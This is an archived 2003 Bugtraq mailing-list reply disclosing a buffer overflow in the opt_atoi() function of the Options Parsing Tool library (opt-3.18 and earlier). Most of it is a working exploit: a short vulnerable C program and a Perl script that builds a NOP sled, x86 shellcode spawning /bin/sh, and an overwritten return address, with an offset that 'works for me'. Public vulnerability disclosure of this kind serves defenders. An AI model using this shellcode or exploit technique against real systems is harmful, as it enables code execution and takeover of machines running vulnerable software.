Re: Options Parsing Tool library buffer overflows.

From: Julien Lanthea (contact_at_jlanthea.net)
Date: 05/23/03

Next message: Chris Robertson: "RE: Outlook Web Access authentication bypass"

Previous message: Paul Szabo: "Eudora 5.2.1 buffer overflow DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 23 May 2003 14:41:39 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) In-Reply-To: <3EA85B02.7080000@snosoft.com>

As the Secure Network Operations, Inc. (http://www.secnetops.com) told on
Bugtraq (Apr 24 2003), the function opt_atoi() from the subroutine library
opt-3.18 and prior is vulnerable to buffer overflow attacks.

Here is a sample showing how to exploit the following vulnerable program
vuln.c using opt_atoi().

vuln.c :
--------

/* To compile vuln.c : */
/* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

main(int *argc, char **argv)
{
/* use OPT opt_atoi() */
int y = opt_atoi(argv[1]); printf("opt_atoi(): %i\n", y);
}

expl-optatoi.pl :
-----------------

#!/usr/bin/perl
#
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing
# Tool shared library opt-3.18 and prior) for this vulnerable code.
#
# vuln.c :
# main(int *argc, char **argv)
# {
# /* use OPT opt_atoi() */
# int y = opt_atoi(argv[1]);
# printf("opt_atoi(): %i\n", y);
# }
#
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
#
# Author :
# jlanthea [contact@jlanthea.net]
#
# Syntax :
# perl expl-optatoi.pl <offset> # works for me with offset = -1090

$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";

$len = 1032; # The length needed to own EIP.
$ret = 0xbffff6c0; # The stack pointer at crash time
$nop = "\x90"; # x86 NOP
$offset = 0; # Default offset to try.

if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

exec("/path/to/vuln $buffer");

Next message: Chris Robertson: "RE: Outlook Web Access authentication bypass"

Previous message: Paul Szabo: "Eudora 5.2.1 buffer overflow DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Understanding char **argv
... char **argv looks like. ... So as to dereference what the pointer that *argv pointed to. ... but modifying argv while leaving argc alone is odd. ...
(comp.lang.c)
Re: char* argv[]
... int main(int argc, char *argv) { ... Your second program thinks argv is a string, ...
(comp.lang.c)
Re: using a shell script to compile your C programs
... void makeprg ... void makeobjs(int argc, char **argv) ... makeobjs(argc, argv); ...
(comp.lang.c)
Re: error running p_threads
... }int main(int argc, char** argv) { ...
(comp.lang.c)
Re: algorithm by eratosthenos
... The usual names for the parameters to main are argc and argv. ... I'm curious, how do you feel about int main(int ac, char **av)? ...
(comp.lang.c)